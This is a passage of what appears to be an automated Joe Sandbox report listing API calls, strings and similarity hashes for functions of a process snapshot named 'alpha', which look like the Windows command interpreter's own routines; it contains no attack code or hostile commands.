                                                                                                                                                                          • Part of subcall function 00007FF6E9434224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6E94342D7
                                                                                                                                                                          • Part of subcall function 00007FF6E9434224: memset.MSVCRT ref: 00007FF6E94342FD
                                                                                                                                                                          • Part of subcall function 00007FF6E9434224: memset.MSVCRT ref: 00007FF6E9434368
                                                                                                                                                                          • Part of subcall function 00007FF6E9434224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6E9434380
                                                                                                                                                                          • Part of subcall function 00007FF6E9434224: wcsrchr.MSVCRT ref: 00007FF6E94343E6
                                                                                                                                                                          • Part of subcall function 00007FF6E9434224: lstrcmpW.KERNELBASE ref: 00007FF6E9434401
                                                                                                                                                                        • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF6E9435BC7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 497088868-0
                                                                                                                                                                        • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                                                                                        • Instruction ID: 63002f12f2f45b4917f73905c18553c902de97b199cf968fb5253802e7cd9eab
                                                                                                                                                                        • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                                                                                        • Instruction Fuzzy Hash: B8318222A1C642C2FA24EF31A4547BD6291BF89BC0F445431E94EC7B95DE3EE549C70A
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: Concurrency::cancel_current_taskmalloc
• String ID:
• API String ID: 1412018758-0
• Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
• Instruction ID: 24e90ddcdf1cbd5e8fc324478c14a78bb300ceec2ecef5aad7b76efbb486a78c
• Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
• Instruction Fuzzy Hash: 2AE09203F6A34BD1FF14BFB2684A37812505F18741F081530CD0D85382EE2EA09DC31A
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDA6
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDBD
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
• Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
• Instruction ID: afb262c4e7b4d1f789f5894ebf3d42889458b3332480acb6b90621e7e466b21c
• Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
• Instruction Fuzzy Hash: A8F01973E28642C6EB148F15F84067CBBA1FF89B41B589534D90E83365DF3EA449C709
APIs
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: exit
• String ID:
• API String ID: 2483651598-0
• Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
• Instruction ID: 1cf6ec1911cf339355e8538ecfa94cb2b605629a0706ab535107191b69e0917c
• Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
• Instruction Fuzzy Hash: 91C0803270464AC7EF1CEF7124651BD15545F08301F05543CC907C1382DE2DD40CC709
APIs
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: DefaultUser
• String ID:
• API String ID: 3358694519-0
• Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
• Instruction ID: d724f958552c4f07faf4e14e6cc65a9f9d97669acaec54717c708fa885029cb3
• Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
• Instruction Fuzzy Hash: 84E08CA3D08262CAF65C6E71A0493BC2993CF68782FC44031CA0D81A884D2E3849D30E
APIs
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: memset
• String ID:
• API String ID: 2221118986-0
• Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
• Instruction ID: 9c13c1979446f7af8cd0720ea07126c0af3c989738780fd673ed8b4a80074967
• Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
• Instruction Fuzzy Hash: C1F0BE22B0978680EA44CB76B94522962909F88BF0F088330EA7C87BC9EE3CD452C305
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: _wcsicmp$AttributeHeapProcThread$ErrorHandleLast$ListProcessmemset$towupper$CloseConsoleCtrlDeleteFreeHandlerInitializeUpdateiswspacewcschr$AllocCreateInfoStartup_wcsnicmp
• String ID: $ /K $ /K %s$"%s"$.LNK$ABOVENORMAL$AFFINITY$BELOWNORMAL$COMSPEC$HIGH$LOW$MAX$MIN$NEWWINDOW$NODE$NORMAL$REALTIME$SEPARATE$SHARED$WAIT
• API String ID: 1388555566-2647954630
• Opcode ID: 5bfa848c86ea83563edc3798e9b62a89bffd279fb50d3622c784112f9d8a1b0e
• Instruction ID: 77d8c78c8941329b874d3fd7965f243c754ac4e1d10f877850494558fc8204e3
• Opcode Fuzzy Hash: 5bfa848c86ea83563edc3798e9b62a89bffd279fb50d3622c784112f9d8a1b0e
• Instruction Fuzzy Hash: 05A29173A08B82C6EB149F65A8143B96BA1FF89B44F408135DE0E87795DF3EE409C706
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: wcschr$FileSize_get_osfhandle_wcsnicmpiswspace
• String ID: &<|>$+: $:$:EOF$=,;$^
• API String ID: 511550188-726566285
• Opcode ID: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
• Instruction ID: 9a6d1f9b86eb519e638a8dc34a24105f564dad644f0768e965b1b05309eaef5a
• Opcode Fuzzy Hash: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
• Instruction Fuzzy Hash: 7E529E33A1C692C6EB248F25A41437A6AA1FF49B44F448135DE4EC3794DF3EE849C70A
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: _wcsnicmp$wcschr$wcstol
• String ID: delims=$eol=$skip=$tokens=$useback$usebackq
• API String ID: 1738779099-3004636944
• Opcode ID: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
• Instruction ID: 453798829dc597a1d69e8d0c3fd9e10b2d5feb1754f5b24081138f83b717136a
• Opcode Fuzzy Hash: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
• Instruction Fuzzy Hash: 3A727933A18652DAEB208FA594143BD37E1BF44B88F418135DE4DD7794EE3EA849C30A
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9447F44
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E9447F5C
                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9447F9E
                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9447FFF
                                                                                                                                                                        • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9448020
                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9448036
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9448061
                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF6E9448075
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E94480D6
                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF6E94480EA
                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF6E9448177
                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF6E944819A
                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF6E94481BD
                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF6E94481DC
                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF6E94481FB
                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF6E944821A
                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF6E9448239
                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9448291
                                                                                                                                                                        • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E94482D7
                                                                                                                                                                        • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E94482FB
                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E944831A
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9448364
                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF6E9448378
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E944839A
                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E94483AE
                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E94483E6
                                                                                                                                                                        • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9448403
                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9448418
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                                                                                                                                        • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                                                                                                        • API String ID: 3637805771-3100821235
                                                                                                                                                                        • Opcode ID: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                                                                                                                                                        • Instruction ID: 64c141f5960ffc301e84fbf8ddf36efad37f035086e6f1b72eb1c9e0130c0058
                                                                                                                                                                        • Opcode Fuzzy Hash: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                                                                                                                                                        • Instruction Fuzzy Hash: 73E19273A18652CAE7109F65E4042BD7AA1FF49B95B448231DD1E93790EF3EA40DCB09
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Filememset$Attributes$ErrorLast$AllocCopyFindFirstVirtualwcschr
                                                                                                                                                                        • String ID: %s$%s
                                                                                                                                                                        • API String ID: 3623545644-3518022669
                                                                                                                                                                        • Opcode ID: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
                                                                                                                                                                        • Instruction ID: 24104f780911271289b88b924450b4f99f0dd371d84d029ecd18e55bc34398d9
                                                                                                                                                                        • Opcode Fuzzy Hash: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
                                                                                                                                                                        • Instruction Fuzzy Hash: 4ED27D73A08682CAEB649F6198403BD67A1FF85748F104139DA4EC7B95DF3EE449CB06
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Console$memset$BufferMode$FullInfoNamePathScreen$CharacterCursorErrorFillFlushHandleInputLastOutputPositionWrite_getch_wcsicmpwcschrwcsrchr
                                                                                                                                                                        • String ID: %9d$%s
                                                                                                                                                                        • API String ID: 4286035211-3662383364
                                                                                                                                                                        • Opcode ID: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
                                                                                                                                                                        • Instruction ID: d913c86c7fe708f27ed1981b2968c8bd0abd5f38ae246691a2a39f214a94ca92
                                                                                                                                                                        • Opcode Fuzzy Hash: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
                                                                                                                                                                        • Instruction Fuzzy Hash: D3528E73A08A82CAEB259F64A8503F977A0FF89B98F404135DA0E87B94DF3DD549C705
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcsrchr$towlower
                                                                                                                                                                        • String ID: fdpnxsatz
                                                                                                                                                                        • API String ID: 3267374428-1106894203
                                                                                                                                                                        • Opcode ID: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
                                                                                                                                                                        • Instruction ID: 7fbc8517a5ea301a47205d09eacb627bf9066d4695ebac4fe71d7381dfbcf46a
                                                                                                                                                                        • Opcode Fuzzy Hash: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
                                                                                                                                                                        • Instruction Fuzzy Hash: 0D42CE63B18A82C6EB64DF3598583B966A1FF49B94F148135DE0E87784DE3EE848C305
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
• String ID: DPATH
• API String ID: 95024817-2010427443
• Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
• Instruction ID: 94554807d9b7b6c50fe2ad7252fc9aaa1b388e8b76f07caf872351eee5fdb1e0
• Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
• Instruction Fuzzy Hash: BD12C273A18686C6EB648F21A440279B7E1FF89B54F444239EA4ED3794DF3EE409CB05
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
